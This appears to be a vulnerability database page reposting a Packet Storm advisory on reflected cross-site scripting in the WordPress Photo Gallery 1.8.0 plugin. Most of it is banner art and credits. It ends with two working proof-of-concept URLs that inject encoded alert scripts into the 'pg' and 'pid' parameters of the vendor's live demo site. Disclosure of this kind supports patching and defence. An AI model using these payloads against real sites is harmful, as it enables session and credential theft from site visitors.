Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormCraCkErPACKETSTORM:168752
HistoryOct 17, 2022 - 12:00 a.m.

WordPress Photo Gallery 1.8.0 Cross Site Scripting

2022-10-1700:00:00
CraCkEr
packetstormsecurity.com
194
wordpress
photo gallery
cross site scripting
reflected xss
manipulate
vulnerable url
exploit
JSON
`┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││ C r a C k E r ┌┘  
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ [ Exploits ] ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: Author : CraCkEr :  
│ Website : wordpress.org/plugins/ │  
│ Vendor : Photo Gallery Team - wpsofts.com │  
│ Software : WordPress Photo Gallery 1.8.0 │  
│ Vuln Type: Reflected XSS │  
│ Method : GET │  
│ Impact : Manipulate the content of the site │  
│ │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: :  
│ Release Notes: │  
│ ═════════════ │  
│ The attacker can send to victim a link containing a malicious URL in an email or │  
│ instant message can perform a wide variety of actions, such as stealing the victim's │  
│ session token or login credentials │  
│ │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Greets:  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
  
CryptoJob (Twitter) twitter.com/CryptozJob  
  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ © CraCkEr 2022 ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
URL parameter 'pg' is vulnerable to XSS  
  
Path: /photo-gallery/  
  
https://wpsofts.com/grid-kit-demo/photo-gallery/?pid=47&pg=2&zdifv%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eh18n1=1  
  
  
URL parameter 'pid' is vulnerable to XSS  
  
Path: /photo-gallery/  
  
https://wpsofts.com/grid-kit-demo/photo-gallery/?pida2sg4%27%2dalert%281%29%2d%27z632u&pg=2  
  
  
[-] Done  
`
JSON